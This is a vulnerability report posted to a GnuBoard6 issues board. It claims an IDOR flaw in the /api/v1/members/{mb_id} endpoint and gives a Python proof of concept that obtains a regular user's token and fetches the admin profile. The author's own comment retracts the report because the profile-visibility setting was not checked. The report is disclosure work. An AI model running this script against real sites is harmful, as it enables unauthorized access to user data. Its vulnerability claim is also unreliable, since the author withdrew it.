Unauthorized User Info Disclosure via IDOR

Unauthorized User Info Disclosure via IDOR > 그누보드6 이슈

그누보드6 이슈

좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.

Unauthorized User Info Disclosure via IDOR 정보

Unauthorized User Info Disclosure via IDOR

oxqnd 이름으로 검색
2025.07.13 16:31:31
92

본문

Summary

An IDOR (Insecure Direct Object Reference) vulnerability exists in the endpoint /api/v1/members/{mb_id} which allows any authenticated user to retrieve arbitrary user profile information, including administrator accounts, by simply modifying the mb_id path parameter.

This constitutes a serious vertical privilege escalation (CWE-269, CWE-284) and sensitive information disclosure (CWE-200).

Step-by-Step Reproduction (PoC)

1. Register and log in as a regular user to obtain JWT access token

import requests

url = "http://localhost:8000/api/v1/token"

credentials = {
    "username": "test",      # username
    "password": "1234"
}

res = requests.post(url, data=credentials)

if res.status_code == 200:
    token_data = res.json()
    access_token = token_data.get("access_token")
    refresh_token = token_data.get("refresh_token")

    print("[+] Access Token:", access_token)
    print("[+] Refresh Token:", refresh_token)
else:
    print(f"[!] 로그인 실패: {res.status_code}")
    print(res.text)

2. Use that regular user's token to access admin profile

import requests

access_token = "<access token from step 1>"
target_mb_id = "admin"

url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
    "Authorization": f"Bearer {access_token}"
}

res = requests.get(url, headers=headers)

print(f"[+] Status: {res.status_code}")
print(res.text)

Vulnerable Response:

{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}

Impact

Any authenticated user can access any other user's profile, including admin.
Disclosed data includes email, nickname, points, and potentially more.
Reflects improper access control and vertical privilege escalation.

CWE References

CWE-269: Improper Privilege Management
CWE-284: Improper Access Control
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

댓글 1개

oxqnd 이름으로 검색 25.07.13 17:12:48

I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.

90레벨 이상 댓글을 남길 수 있습니다.